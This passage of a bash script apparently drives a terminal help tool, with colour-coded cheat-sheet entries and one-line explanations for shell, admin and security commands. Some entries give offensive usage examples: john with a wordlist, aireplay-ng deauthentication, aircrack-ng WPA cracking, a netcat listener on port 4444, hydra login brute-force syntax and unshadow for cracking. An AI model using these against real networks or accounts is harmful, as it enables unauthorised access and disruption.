  [john]=$'password cracker\n  \e[36m--wordlist\e[0m=\e[33mFILE\e[0m   dictionary attack\n  \e[36m--show\e[0m        display cracked    \e[36m--list\e[0m=formats  list types\n  \e[35mvs hashcat\e[0m john is CPU-based with smart auto-format detection.\n          hashcat uses GPU for massive throughput\n  \e[2mjohn --wordlist=rockyou.txt hash.txt    john --show hash.txt\e[0m'
  [tshark]=$'terminal packet analyzer\n  \e[36m-i\e[0m \e[33mIFACE\e[0m  capture live           \e[36m-r\e[0m \e[33mFILE\e[0m   read pcap\n  \e[36m-w\e[0m \e[33mFILE\e[0m   write pcap             \e[36m-c\e[0m \e[33mN\e[0m      capture N packets\n  \e[36m-Y\e[0m \e[33mFILTER\e[0m display filter         \e[36m-T\e[0m fields output format\n  \e[36m-e\e[0m \e[33mFIELD\e[0m  extract field          \e[36m-q\e[0m        quiet (stats only)\n  \e[36m-z\e[0m \e[33mSTAT\e[0m   statistics\n  \e[35mvs tcpdump\e[0m tshark has deep protocol dissection and display filters.\n          tcpdump is lightweight and available everywhere\n  \e[2mtshark -i eth0 -w cap.pcap    tshark -r cap.pcap -Y http    tshark -q -z conv,tcp\e[0m'
  [tcpdump]=$'packet capture\n  \e[36m-i\e[0m \e[33mIFACE\e[0m  capture interface      \e[36m-w\e[0m \e[33mFILE\e[0m   write to pcap\n  \e[36m-r\e[0m \e[33mFILE\e[0m   read from pcap         \e[36m-c\e[0m \e[33mN\e[0m      capture N packets\n  \e[36m-n\e[0m        no DNS resolution      \e[36m-vvv\e[0m      max verbosity\n  \e[35mvs tshark\e[0m tcpdump is lightweight, CLI-first, everywhere.\n          tshark has deep protocol dissection and display filters\n  \e[2mtcpdump -i eth0 -w cap.pcap    tcpdump -r cap.pcap    tcpdump -i eth0 -c 100\e[0m'
  [nc]=$'network tool (netcat)\n  \e[36m-l\e[0m        listen mode            \e[36m-v\e[0m        verbose\n  \e[36m-p\e[0m \e[33mPORT\e[0m   local port             \e[36m-z\e[0m        scan (no data)\n  \e[36m-n\e[0m        no DNS resolution\n  \e[35mvs ncat\e[0m   nc (netcat) is basic but everywhere.\n          ncat (from nmap) adds SSL, proxying, -e exec\n  \e[2mnc -lvnp 4444    nc -zv host 1-1000\e[0m'
  [iptables]=$'firewall rules\n  \e[36m-A\e[0m \e[33mCHAIN\e[0m  append rule            \e[36m-L\e[0m        list rules\n  \e[36m-F\e[0m        flush all              \e[36m-X\e[0m        delete chains\n  \e[36m-j\e[0m \e[33mTARGET\e[0m ACCEPT/DROP/REJECT     \e[36m-p\e[0m \e[33mPROTO\e[0m  tcp/udp\n  \e[36m-s\e[0m \e[33mIP\e[0m     source address         \e[36m-m\e[0m \e[33mMOD\e[0m    match module\n  \e[36m-n\e[0m        numeric output         \e[36m-v\e[0m        verbose\n  \e[36m--dport\e[0m \e[33mPORT\e[0m  destination port  \e[36m--limit\e[0m \e[33mRATE\e[0m  rate limit\n  \e[2miptables -A INPUT -s IP -j DROP    iptables -L -n -v    iptables -F\e[0m'
  [eza]=$'modern ls replacement\n  \e[36m-l\e[0m        details (perms, owner, size, date)\n  \e[36m-a\e[0m        show hidden\n  \e[36m-h\e[0m        column headers         \e[36m-R\e[0m        recursive\n  \e[36m-T\e[0m        tree view              \e[36m-L\e[0m \e[33mN\e[0m      tree depth\n  \e[36m-D\e[0m        dirs only              \e[36m-r\e[0m        reverse sort\n  \e[36m--sort\e[0m \e[33mFIELD\e[0m  sort by field\n  \e[35mvs ls\e[0m     eza has git integration, color, tree built-in.\n          ls is POSIX/everywhere and scriptable\n  \e[2meza -la    eza -T -L 2    eza --sort size\e[0m'
  [pacman]=$'package manager (Arch)\n  \e[36m-S\e[0m \e[33mPKG\e[0m    install package        \e[36m-Sy\e[0m       sync repos\n  \e[36m-Syu\e[0m      full upgrade           \e[36m-Ss\e[0m \e[33mTERM\e[0m  search packages\n  \e[36m-Q\e[0m        list installed         \e[36m-Qi\e[0m \e[33mPKG\e[0m   package info\n  \e[36m-Qo\e[0m \e[33mFILE\e[0m  which package owns\n  \e[2mpacman -Syu    pacman -Ss term    pacman -Qi pkg    pacman -Qo /usr/bin/cmd\e[0m'
  [xxd]=$'hex dump\n  \e[36m-p\e[0m        plain hex (no addr)    \e[36m-r\e[0m        reverse (hex to bin)\n  \e[2mxxd file    xxd -p file    echo hex | xxd -r -p\e[0m'
  [strings]=$'extract text from binary\n  \e[36m-n\e[0m \e[33mN\e[0m      minimum length         \e[36m-e\e[0m \e[33mENC\e[0m    encoding (l=UTF-16LE)\n  \e[2mstrings binary    strings -n 10 binary    strings -e l binary\e[0m'
  [readelf]=$'ELF binary inspector\n  \e[36m-h\e[0m        file header            \e[36m-s\e[0m        symbols\n  \e[36m-a\e[0m        all info\n  \e[2mreadelf -h binary    readelf -s binary    readelf -a binary\e[0m'
  [binwalk]=$'binary analysis\n  \e[36m-e\e[0m        extract embedded       \e[36m-E\e[0m        entropy analysis\n  \e[2mbinwalk binary    binwalk -e binary    binwalk -E binary\e[0m'
  [foremost]=$'file recovery\n  \e[36m-i\e[0m \e[33mFILE\e[0m   input image            \e[36m-o\e[0m \e[33mDIR\e[0m    output directory\n  \e[36m-t\e[0m \e[33mTYPES\e[0m  file types (jpg,pdf)\n  \e[2mforemost -i image.dd    foremost -t jpg,pdf -i image.dd -o output/\e[0m'
  [fls]=$'filesystem listing (TSK)\n  \e[36m-r\e[0m        recursive              \e[36m-d\e[0m        deleted files only\n  \e[36m-m\e[0m \e[33mPATH\e[0m   mactime bodyfile\n  \e[2mfls image.dd    fls -r image.dd    fls -d image.dd    fls -r -m / image.dd\e[0m'
  [rev]=$'reverse each line of text\n  \e[2mrev file    echo hello | rev    rev <<< word\e[0m'
  [bc]=$'calculator\n  \e[2mbc <<< \x272+3\x27    echo \x27scale=2; 10/3\x27 | bc\e[0m'
  [jobs]=$'list background jobs\n  \e[36m-l\e[0m        show PIDs\n  \e[32m%1\e[0m        refer to job 1         \e[32m%%\e[0m        current job\n  \e[2mjobs    jobs -l\e[0m'
  [fg]=$'bring job to foreground\n  \e[2mfg    fg %1    fg %jobname\e[0m'
  [bg]=$'continue stopped job in background\n  \e[2mbg    bg %1\e[0m'
  [kill]=$'send signal to process\n  \e[36m-9\e[0m        SIGKILL (force)        \e[36m-15\e[0m       SIGTERM (graceful)\n  \e[36m-STOP\e[0m     pause process          \e[36m-CONT\e[0m     resume process\n  \e[2mkill PID    kill %1    kill -9 PID    kill -STOP PID\e[0m'
  [wait]=$'wait for background jobs to finish\n  \e[2mwait    wait %1    wait $PID\e[0m'
  [disown]=$'detach job from shell (survives logout)\n  \e[36m-a\e[0m        all jobs               \e[36m-h\e[0m        mark only (don\x27t remove)\n  \e[2mdisown %1    disown -a\e[0m'
  [sleep]=$'pause for N seconds\n  \e[2msleep 1    sleep 0.5    sleep 5\e[0m'
  [jq]=$'JSON processor\n  \e[36m-r\e[0m        raw output (no quotes) \e[36m-c\e[0m        compact output\n  \e[36m-e\e[0m        exit 1 if null         \e[36m-s\e[0m        slurp into array\n  \e[31m.key\e[0m      extract field          \e[31m.key[]\e[0m    iterate array\n  \e[31mselect()\e[0m  filter items           \e[31m| length\e[0m  count elements\n  \e[2mjq . file    jq -r \x27.name\x27 file    jq \x27.[] | select(.active)\x27 file\e[0m'
  [set]=$'shell options\n  \e[36m-e\e[0m        exit on error          \e[36m-u\e[0m        error on undefined var\n  \e[36m-x\e[0m        trace commands         \e[36m-o\e[0m \e[32mpipefail\e[0m  fail on pipe error\n  \e[2mset -e    set -euo pipefail    set -x\e[0m'
  [trap]=$'handle signals\n  \e[33mCMD\e[0m \e[33mSIGNAL\e[0m            run CMD on SIGNAL\n  \e[36m-\e[0m \e[33mSIGNAL\e[0m              reset to default\n  \e[33mCMD\e[0m \e[32mEXIT\e[0m               run on script exit\n  \e[2mtrap \x27echo caught\x27 SIGINT    trap cleanup EXIT    trap - SIGINT\e[0m'
  [id]=$'show user/group identity\n  \e[36m-u\e[0m        UID only               \e[36m-g\e[0m        GID only\n  \e[36m-G\e[0m        all group IDs          \e[36m-n\e[0m        names instead of numbers\n  \e[2mid    id -u    id -Gn    id username\e[0m'
  [mount]=$'attach filesystem\n  \e[36m-o\e[0m \e[33mOPTS\e[0m   options (ro, loop, noexec, nosuid, remount)\n  \e[36m-t\e[0m \e[33mTYPE\e[0m   filesystem type        \e[36m-w\e[0m        read-write\n  \e[2mmount /dev/sda1 /mnt    mount -o ro,loop img /mnt    mount -o remount,rw /\e[0m'
  [chroot]=$'change root directory\n  \e[2mchroot /mnt /bin/bash    chroot /mnt cmd\e[0m'
  [fsck]=$'filesystem check/repair\n  \e[36m-y\e[0m        auto-fix               \e[36m-n\e[0m        dry run\n  \e[2mfsck /dev/sda1    fsck -y /dev/sda1\e[0m'
  [dd]=$'low-level block copy\n  \e[32mif=\e[0m       input file             \e[32mof=\e[0m       output file\n  \e[32mbs=\e[0m       block size             \e[32mcount=\e[0m    number of blocks\n  \e[32mstatus=progress\e[0m  show transfer rate\n  \e[32mconv=noerror,sync\e[0m  continue on errors\n  \e[2mdd if=/dev/sda of=disk.img bs=4M status=progress\e[0m'
  [lsof]=$'list open files\n  \e[36m-i\e[0m        network connections    \e[36m-p\e[0m \e[33mPID\e[0m    by process\n  \e[36m-u\e[0m \e[33mUSER\e[0m   by user\n  \e[2mlsof -i :80    lsof -p 1234    lsof /path/to/file\e[0m'
  [dmesg]=$'kernel ring buffer\n  \e[36m-T\e[0m        human timestamps       \e[36m-w\e[0m        follow live\n  \e[36m-l\e[0m \e[33mLEVEL\e[0m  filter by level (err, warn)\n  \e[2mdmesg -T    dmesg -Tw    dmesg -l err\e[0m'
  [cryptsetup]=$'LUKS disk encryption\n  \e[32mluksOpen\e[0m   unlock volume          \e[32mluksClose\e[0m  lock volume\n  \e[32mluksFormat\e[0m format as LUKS\n  \e[2mcryptsetup luksOpen /dev/sda2 crypt    cryptsetup luksClose crypt\e[0m'
  [vol]=$'volatility3 memory forensics\n  \e[32mwindows.pslist\e[0m      process list\n  \e[32mwindows.netscan\e[0m     network connections\n  \e[32mwindows.cmdline\e[0m     command lines\n  \e[32mwindows.filescan\e[0m    file objects\n  \e[2mvol -f dump.raw windows.pslist    vol -f dump.raw windows.netscan\e[0m'
  [airmon-ng]=$'wireless monitor mode\n  \e[32mstart\e[0m     enable monitor         \e[32mstop\e[0m      disable monitor\n  \e[32mcheck kill\e[0m stop interfering processes\n  \e[2mairmon-ng start wlan0    airmon-ng stop wlan0mon    airmon-ng check kill\e[0m'
  [airodump-ng]=$'wireless packet capture\n  \e[36m-c\e[0m \e[33mCH\e[0m     channel                \e[36m--bssid\e[0m \e[33mMAC\e[0m  target AP\n  \e[36m-w\e[0m \e[33mPREFIX\e[0m write capture\n  \e[2mairodump-ng wlan0mon    airodump-ng -c 6 --bssid AA:BB:CC -w cap wlan0mon\e[0m'
  [aireplay-ng]=$'wireless packet injection\n  \e[36m-0\e[0m \e[33mN\e[0m      deauth N packets       \e[36m-a\e[0m \e[33mBSSID\e[0m  target AP\n  \e[36m-c\e[0m \e[33mCLIENT\e[0m target client\n  \e[2maireplay-ng -0 5 -a AP_MAC -c CLIENT_MAC wlan0mon\e[0m'
  [aircrack-ng]=$'wireless key cracker\n  \e[36m-w\e[0m \e[33mFILE\e[0m   wordlist               \e[36m-b\e[0m \e[33mBSSID\e[0m  target AP\n  \e[2maircrack-ng -w wordlist.txt -b AA:BB:CC cap-01.cap\e[0m'
  [getcap]=$'show file capabilities\n  \e[36m-r\e[0m        recursive search\n  \e[2mgetcap -r / 2>/dev/null\e[0m'
  [exiftool]=$'read/write file metadata\n  \e[2mexiftool image.jpg    exiftool -all= image.jpg    exiftool -GPS* image.jpg\e[0m'
  [shred]=$'securely overwrite file \e[2m(ineffective on SSD/journaling/CoW fs)\e[0m\n  \e[36m-n\e[0m \e[33mN\e[0m      overwrite N times      \e[36m-z\e[0m        final zero pass\n  \e[36m-u\e[0m        remove after\n  \e[2mshred -zu file    shred -n 3 -zu file\e[0m'
  [diff]=$'compare files line by line\n  \e[36m-u\e[0m        unified format         \e[36m-y\e[0m        side by side\n  \e[36m-r\e[0m        recursive (dirs)       \e[36m-q\e[0m        brief (files differ only)\n  \e[36m-i\e[0m        ignore case            \e[36m-w\e[0m        ignore whitespace\n  \e[36m-B\e[0m        ignore blank lines     \e[36m--color\e[0m   colorized output\n  \e[2mdiff file1 file2    diff -u old new    diff -rq dir1/ dir2/\e[0m'
  [base64]=$'encode/decode base64\n  \e[36m-d\e[0m        decode                 \e[36m-w\e[0m \e[33mN\e[0m      wrap at N columns (0=none)\n  \e[2mbase64 file    echo text | base64    echo encoded | base64 -d\e[0m'
  [openssl]=$'crypto toolkit\n  \e[32menc\e[0m       encrypt/decrypt        \e[32mdgst\e[0m      hash/sign\n  \e[32mreq\e[0m       certificate request    \e[32mx509\e[0m      certificate utility\n  \e[32ms_client\e[0m  TLS test client        \e[32mrand\e[0m      random bytes\n  \e[2mopenssl enc -aes-256-cbc -in f -out f.enc    openssl s_client -connect host:443\e[0m'
  [docker]=$'container runtime\n  \e[32mrun\e[0m       create+start           \e[32mexec\e[0m      run in container\n  \e[32mps\e[0m        list containers        \e[32mimages\e[0m    list images\n  \e[32mbuild\e[0m     build image            \e[32mpull\e[0m      download image\n  \e[32mstop\e[0m      stop container         \e[32mrm\e[0m        remove container\n  \e[32mlogs\e[0m      container logs         \e[32mcompose\e[0m   multi-container\n  \e[2mdocker run -it ubuntu bash    docker ps -a    docker exec -it ID bash\e[0m'
  [rsync]=$'incremental file transfer\n  \e[36m-a\e[0m        archive (preserve all) \e[36m-v\e[0m        verbose\n  \e[36m-z\e[0m        compress transfer      \e[36m--delete\e[0m  remove extra files\n  \e[36m-n\e[0m        dry run                \e[36m--progress\e[0m show progress\n  \e[36m-e\e[0m \e[33m\'ssh\'\e[0m  transfer over SSH\n  \e[35mvs scp\e[0m    rsync only sends changes (fast for repeat transfers).\n          scp copies everything every time\n  \e[2mrsync -avz src/ dst/    rsync -avz -e ssh dir/ host:dir/\e[0m'
  [scp]=$'secure copy over SSH\n  \e[36m-r\e[0m        recursive (dirs)       \e[36m-P\e[0m \e[33mPORT\e[0m   custom port\n  \e[35mvs rsync\e[0m  scp copies everything. rsync only sends changes.\n          prefer rsync for large/repeat transfers\n  \e[2mscp file user@host:path    scp -r dir/ user@host:path    scp user@host:file .\e[0m'
  [ip]=$'network configuration\n  \e[32maddr\e[0m      show/set addresses     \e[32mlink\e[0m      network devices\n  \e[32mroute\e[0m     routing table          \e[32mneigh\e[0m     ARP cache\n  \e[36m-c\e[0m        colorized output       \e[36m-br\e[0m       brief format\n  \e[35mvs ifconfig\e[0m ip is modern and featureful.\n          ifconfig is legacy but still on older systems\n  \e[2mip addr    ip route    ip link    ip neigh    ip -c addr\e[0m'
  [chown]=$'change file owner/group\n  \e[36m-R\e[0m        recursive              \e[36m--reference\e[0m=\e[33mFILE\e[0m copy ownership\n  \e[33mUSER:GROUP\e[0m owner and group       \e[33mUSER\e[0m      owner only\n  \e[2mchown user file    chown user:group file    chown -R user:group dir/\e[0m'
  [apt]=$'package manager (Debian/Ubuntu)\n  \e[32minstall\e[0m   install package        \e[32mremove\e[0m    uninstall package\n  \e[32mupdate\e[0m    refresh repo lists     \e[32mupgrade\e[0m   upgrade all\n  \e[32msearch\e[0m    find packages          \e[32mshow\e[0m      package info\n  \e[36m-y\e[0m        auto-confirm\n  \e[2mapt install pkg    apt update && apt upgrade    apt search term\e[0m'
  [dnf]=$'package manager (Fedora/RHEL)\n  \e[32minstall\e[0m   install package        \e[32mremove\e[0m    uninstall package\n  \e[32mupgrade\e[0m   upgrade all            \e[32msearch\e[0m    find packages\n  \e[32minfo\e[0m      package info           \e[32mlist\e[0m      list packages\n  \e[36m-y\e[0m        auto-confirm\n  \e[2mdnf install pkg    dnf upgrade    dnf search term\e[0m'
  [netstat]=$'network statistics (legacy)\n  \e[36m-t\e[0m        TCP                    \e[36m-u\e[0m        UDP\n  \e[36m-l\e[0m        listening              \e[36m-n\e[0m        numeric ports\n  \e[36m-p\e[0m        show process           \e[36m-r\e[0m        routing table\n  \e[35mvs ss\e[0m     netstat is deprecated. ss is faster and modern.\n          use ss -tlnp instead of netstat -tlnp\n  \e[2mnetstat -tlnp    netstat -tunapl    netstat -r\e[0m'
  [readlink]=$'show symlink target\n  \e[36m-f\e[0m        canonicalize (full path)  \e[36m-e\e[0m    canonicalize (must exist)\n  \e[35mvs realpath\e[0m readlink shows the link target.\n          realpath resolves the full canonical path\n  \e[2mreadlink link    readlink -f link    readlink -e link\e[0m'
  [alias]=$'create command shortcuts\n  \e[33mNAME\e[0m=\e[33m\x27CMD\x27\e[0m  define alias           \e[2m(no alias)\e[0m  list all\n  \e[2malias ll=\x27ls -la\x27    alias gs=\x27git status\x27    alias\e[0m'
  [unalias]=$'remove alias\n  \e[36m-a\e[0m        remove all aliases\n  \e[2munalias ll    unalias -a\e[0m'
  [watch]=$'run command repeatedly\n  \e[36m-n\e[0m \e[33mN\e[0m      interval (seconds)       \e[36m-d\e[0m        highlight changes\n  \e[36m-t\e[0m        no title header          \e[36m-g\e[0m        exit on change\n  \e[2mwatch -n 2 df -h    watch -d free -h    watch -n 5 \x27ps aux | head\x27\e[0m'
  [stat]=$'file metadata\n  \e[36m-c\e[0m \e[33mFMT\e[0m    custom format            \e[36m-f\e[0m        filesystem info\n  \e[33m%s\e[0m size  \e[33m%U\e[0m owner  \e[33m%G\e[0m group  \e[33m%a\e[0m octal perms  \e[33m%y\e[0m modified\n  \e[2mstat file    stat -c %s file    stat -c \x27%a %U %G\x27 file\e[0m'
  [umask]=$'default permission mask\n  \e[32m022\e[0m       files 644, dirs 755      \e[32m077\e[0m       files 600, dirs 700\n  \e[36m-S\e[0m        symbolic output\n  \e[2mumask    umask 022    umask -S\e[0m'
  [nohup]=$'run command immune to hangups\n  keeps running after terminal closes (output to nohup.out)\n  \e[35mvs disown\e[0m  nohup starts immune. disown detaches an already-running job\n  \e[2mnohup ./script.sh &    nohup cmd > out.log 2>&1 &\e[0m'
  [file]=$'identify file type\n  \e[36m-i\e[0m        MIME type                \e[36m-b\e[0m        brief (no filename)\n  \e[2mfile image.png    file binary    file -i document.pdf\e[0m'
  [ssh-keygen]=$'generate SSH key pairs\n  \e[36m-t\e[0m \e[33mTYPE\e[0m   key type (ed25519, rsa)  \e[36m-b\e[0m \e[33mBITS\e[0m   key size\n  \e[36m-C\e[0m \e[33mTEXT\e[0m   comment                  \e[36m-f\e[0m \e[33mFILE\e[0m   output file\n  \e[35med25519\e[0m   modern, fast, secure (preferred)\n  \e[35mrsa 4096\e[0m  compatible everywhere\n  \e[2mssh-keygen -t ed25519    ssh-keygen -t rsa -b 4096\e[0m'
  [basename]=$'strip directory from path\n  \e[33mSUFFIX\e[0m    also strip suffix\n  \e[2mbasename /var/log/syslog    basename file.tar.gz .tar.gz\e[0m'
  [dirname]=$'strip filename from path\n  \e[2mdirname /var/log/syslog    dirname /home/user/file.txt\e[0m'
)
_mp_show() {
  local cmd=$1 _t; local data="${MANPAGE[$cmd]}"
  printf -v _t "%s %s\n" "${W}${B}${cmd}${N}" "${D}- ${data%%$'\n'*}${N}"; _EBUF+=$_t
  printf -v _t '%s\n' "${data#*$'\n'}"; _EBUF+=$_t
}

declare -A EXP=(
  [pwd]="print working directory (where you are)"
  [echo]="print text to stdout" [cat]="concatenate and display file contents" [ls]="list directory contents"
  [cd]="change directory" [cp]="copy files" [mv]="move/rename files" [rm]="delete files permanently"
  [mkdir]="create directory" [rmdir]="remove empty directory" [touch]="create file/update timestamp"
  [which]="find command location" [type]="describe command" [alias]="create shortcut" [unalias]="remove alias"
  [watch]="repeat command on interval" [ssh-keygen]="generate SSH keys" [ssh-copy-id]="install SSH key on remote"
  [head]="head -N FILE: first ${Y}N${N} lines (default 10)"
  [tail]="tail -N FILE: last ${Y}N${N} lines (-f to follow)"
  [grep]="grep PATTERN FILE: search lines matching pattern"
  [find]="find PATH -name 'x': locate files by name/size/date"
  [wc]="word count: -l lines, -w words, -c bytes"
  [sort]="sort lines alphabetically (-n numeric, -r reverse, -k N by column ${Y}N${N})"
  [uniq]="filter adjacent duplicates (-c count, -d dupes only — sort -u can't do these)" [cut]="cut -d',' -fN: extract column N (simple columns — awk for logic/math)"
  ['--sort=-%cpu']="sort by CPU% descending (- = descending)"
  ['--sort=-%mem']="sort by memory% descending"
  [tr]="tr FROM TO: map chars (tr a-z A-Z = lowercase->uppercase)"
  [diff]="compare files" [tar]="archive tool" [tee]="split output: file AND screen (>> = file only)" [xargs]="build commands from stdin"
  [chmod]="change permissions" [kill]="send signal to process (default: terminate)" [jobs]="list background jobs" [fg]="foreground job"
  [bg]="background job" [sleep]="pause N seconds" [make]="build tool" [gcc]="C compiler"
  [date]="show/set date" [du]="disk usage" [ps]="list processes"
  [dd]="low-level copy" [strings]="extract text from binary" [base64]="encode/decode base64"
  [rg]="ripgrep: fast grep (respects .gitignore, recursive by default — grep is POSIX/everywhere)"
  [fd]="fast find (regex default, respects .gitignore — find is POSIX/everywhere, more powerful predicates)"
  [eza]="modern ls (git integration, color — ls is POSIX/everywhere)"
  [bat]="cat with highlighting (use cat for piping, bat for reading)"
  [sd]="simple sed (literal strings by default — sed uses regex)" [dust]="visual du (bar chart — du is POSIX/scriptable)"
  [tree]="directory tree" [sed]="stream editor" [xxd]="hex dump"
  [md5sum]="MD5 hash (weak)" [sha256sum]="SHA256 hash" [nmap]="port scanner" [hydra]="password cracker"
  [hashcat]="GPU hash cracker" [john]="John the Ripper" [tshark]="terminal wireshark"
  [masscan]="fast port scanner" [airmon-ng]="WiFi monitor mode"
  [airodump-ng]="capture 802.11" [aireplay-ng]="inject packets" [aircrack-ng]="crack WPA/WEP"
  [nc]="netcat" [ncat]="nmap netcat (supports -e)" [smbclient]="SMB client" [lynis]="security audit" [binwalk]="firmware analysis"
  [foremost]="file recovery" [fls]="list disk image" [exiftool]="file metadata" [readelf]="ELF info"
  [r2]="radare2 RE framework" [vol]="memory forensics (volatility3)" [mactime]="filesystem timeline"
  [proxychains]="proxy traffic" [procs]="modern ps"
  [awk]="pattern scanning & processing" [jq]="JSON processor" [curl]="transfer data (HTTP/FTP)"
  [ssh]="secure shell" [scp]="secure copy (prefer rsync for large/repeat transfers)" [rsync]="incremental transfer (only sends changes — always prefer over scp)"
  [zip2john]="extract hash from zip" [pdf2john]="extract hash from pdf" [rar2john]="extract hash from rar"
  [openssl]="crypto toolkit" [socat]="multipurpose relay"
  [ln]="create links" [readlink]="show link target" [pgrep]="find process by name" [pkill]="kill by name"
  [pidof]="get PID by name" [pstree]="process tree" [ip]="network config" [ss]="socket statistics"
  [whoami]="print current username" [chgrp]="change group ownership" [file]="identify file type"
  [chown]="change file owner/group" [stat]="show file metadata" [umask]="set default permissions"
  [nohup]="run immune to hangups" [disown]="detach job from shell" [basename]="strip directory from path" [dirname]="strip filename from path"
  [lsof]="list open files" [systemctl]="systemd control" [journalctl]="systemd logs"
  [wget]="download files (resume, mirror — curl is for APIs)" [unlink]="remove exactly one file/link (safer than rm for single targets)"
  ['$$']="current shell PID" ['$?']="last exit code" ['$!']="last background PID"
  ['$#']="argument count" ['$@']="all arguments" ['$0']="script name"
  ['!!']="repeat last command" ['!$']="last arg of prev cmd" ['!^']="first arg of prev cmd" ['!*']="all args of prev cmd"
  ['>']="write stdout to file (overwrite — output disappears from terminal)" ['>>']="append stdout to file (output disappears from terminal — use tee to see it too)"
  ['2>']="redirect stderr to file" ['&>']="redirect stdout+stderr to file"
  ['/dev/null']="black hole: discards anything written to it" ['2>&1']="merge stderr into stdout" ['>&2']="send stdout to stderr" ['1>&2']="send stdout to stderr"
  ['<']="input redirect: feed FILE contents into command"
  ['<<<']="here-string: feed a STRING into command"
  ['.']="current directory" ['..']="parent directory" ['~']="home directory" ['/']="root directory (or path separator)"
  ['*']="wildcard: matches any characters" ['?']="wildcard: matches single character"
  ['*.py']="glob: all .py files" ['*.log']="glob: all .log files" ['*.txt']="glob: all .txt files"
  ['*.sh']="glob: all .sh files" ['*.conf']="glob: all .conf files"
  ["'*.py'"]="glob: all .py files (quoted)" ["'*.log'"]="glob: all .log files (quoted)"
  ["'*.txt'"]="glob: all .txt files (quoted)" ["'*.sh'"]="glob: all .sh files (quoted)"
  ["'*.conf'"]="glob: all .conf files (quoted)" ["'*'"]="glob: all files (quoted)"
  ["'...'"]="single quotes: literal string, no expansion" ['"..."']="double quotes: allows \$var expansion"
  ["'hello'"]="literal string 'hello'"
  ['|']="pipe: cmd1 | cmd2 (stdout->stdin)" ['|&']="pipe stdout+stderr"
  ['&&']="run next only if previous succeeds" ['||']="run next only if previous fails"
  ['&']="run in background (returns immediately)"
  ['a-z']="character range: all lowercase letters" ['A-Z']="character range: all uppercase letters" ['0-9']="character range: all digits"
  ['${#var}']="string length" ['${var:-}']="default if unset" ['${var:=}']="set if unset"
  ['${var:?}']="error if unset" ['${var:+}']="alt if set" ['${var#}']="remove prefix (short)"
  ['${var##}']="remove prefix (long)" ['${var%}']="remove suffix (short)" ['${var%%}']="remove suffix (long)"
  ['${var/}']="replace first" ['${var//}']="replace all" ['${var:n}']="substring from n"
  ['${var:n:m}']="substring n to m" ['${var,,}']="lowercase" ['${var^^}']="uppercase"
  [declare]="declare variable type" [mapfile]="read lines into array (same as readarray)" [readarray]="read lines into array (same as mapfile)"
  ['${arr[@]}']="all array elements" ['${#arr[@]}']="array length" ['${!arr[@]}']="array indices"
  [if]="conditional execution" [then]="if body start" [else]="if alternative" [elif]="else if"
  [fi]="end if" [for]="loop over items" [while]="loop while true" [until]="loop until true"
  [do]="loop body start" [done]="end loop" [case]="pattern matching" [esac]="end case"
  [function]="define function" [local]="local variable" [return]="function return"
  [trap]="handle signals" [set]="shell options" [shopt]="bash options"
  [strace]="trace syscalls" [ltrace]="trace library calls" [watch]="run command repeatedly"
  [inotifywait]="watch filesystem events" [parallel]="run jobs in parallel" [flock]="file locking"
  [timeout]="limit command runtime" [chroot]="change root dir" [fsck]="filesystem check"
  [cryptsetup]="LUKS encryption" [iptables]="IPv4 firewall" [nftables]="netfilter firewall"
  [shred]="secure file delete" [smartctl]="disk SMART info" [gcore]="dump process memory"
  [coproc]="coprocess (bidirectional pipe)" [mkfifo]="create named pipe" [fuser]="find process using file"
  [renice]="change process priority" [cgcreate]="create cgroup" [cgexec]="run in cgroup"
  [enum4linux]="SMB enumeration"
  [chkrootkit]="rootkit checker" [rkhunter]="rootkit hunter"
  [bc]="calculator" [rev]="reverse chars per line" [docker]="container runtime" [crontab]="schedule tasks"
  [tcpdump]="packet capture" [iw]="wireless config"
  [radare2]="reverse engineering framework (r2)" [volatility]="memory forensics (vol)"
  [volatility3]="memory forensics (vol)" [vol.py]="memory forensics (legacy)"
  [vol3]="memory forensics (volatility3)" [vol3.py]="memory forensics (volatility3)"
  [photorec]="file recovery (carving)" [scalpel]="file carving tool"
  [egrep]="extended grep (use grep -E)" [hostnamectl]="show/set hostname (systemd)"
  [findmnt]="list mounted filesystems" [printenv]="print environment variables"
  [shasum]="SHA checksum" [sha1sum]="SHA-1 hash"
  [git]="version control" [clone]="copy repository" [commit]="save changes" [push]="upload to remote"
  [pull]="download from remote" [fetch]="download without merge" [merge]="combine branches"
  [rebase]="reapply commits" [stash]="save changes temporarily" [branch]="manage branches"
  [checkout]="switch branch/restore" [switch]="switch branches" [restore]="restore files"
  [reset]="undo commits" [revert]="undo with new commit" [cherry-pick]="apply specific commit"
  [bisect]="binary search for bug" [reflog]="reference logs" [blame]="show line authors"
  [tag]="mark releases" [remote]="manage remotes" [log]="show history"
  [tmux]="terminal multiplexer" [attach]="connect to session"
  [detach]="disconnect from session" [new-session]="create session" [kill-session]="destroy session"
  [split-window]="create pane" [select-pane]="switch pane" [resize-pane]="change pane size"
  [send-keys]="type in pane" [capture-pane]="copy pane content" [source-file]="reload config"
  [getcap]="show capabilities" [setcap]="set capabilities" [whoami]="current user"
  [id]="user/group IDs" [sudo]="run as root" [su]="switch user" [passwd]="change password"
  [useradd]="create user" [usermod]="modify user" [chown]="change owner" [chgrp]="change group"
  [mount]="attach filesystem" [umount]="detach filesystem" [showmount]="list NFS exports"
  [lxc]="LXD container tool" [searchsploit]="exploit database search"
  ['-sV']="nmap version detection" ['-sC']="nmap default scripts" ['-A']="nmap aggressive scan"
  ['-sU']="nmap UDP scan" ['-sn']="nmap ping scan" ['-sT']="nmap TCP connect" ['-Pn']="nmap skip ping"
  ['-p-']="nmap all ports" ['-oN']="nmap normal output" ['-oG']="nmap greppable" ['-oA']="nmap all formats"
  ['{}']="filename placeholder" ['\;']="end -exec" ['-exec']="run on each" ['-delete']="delete matches"
  ['-name']="match filename" ['-size']="match size" ['-type']="match type" ['-mmin']="match time" ['-path']="match path" ['-not']="negate"
  ['NR']="awk line number" ['NF']="awk field count" ['$1']="first field" ['$NF']="last field" ['FS']="field separator"
  ['http-post-form']="POST login (hydra): '/path:user=^USER^&pass=^PASS^:fail_text'" ['http-get']="GET auth (hydra)"
  [paru]="AUR helper (pacman wrapper)" [env]="show/set environment variables"
  [dmesg]="kernel ring buffer messages" [netstat]="network stats (legacy, use ss)"
  [comm]="compare two sorted files line by line" [python3]="Python 3 interpreter"
  [nft]="nftables firewall CLI" [uname]="system info (-a for all)"
  [ping]="test network connectivity" [dig]="DNS lookup" [host]="DNS lookup (simple)"
  [userdel]="delete user account" [hostname]="show/set hostname"
  [unshadow]="combine passwd+shadow for cracking" [ldd]="list shared library dependencies"
  [iwlist]="wireless scan (legacy)"
  [mkinitcpio]="generate initramfs (Arch)" [grub-mkconfig]="generate GRUB config"
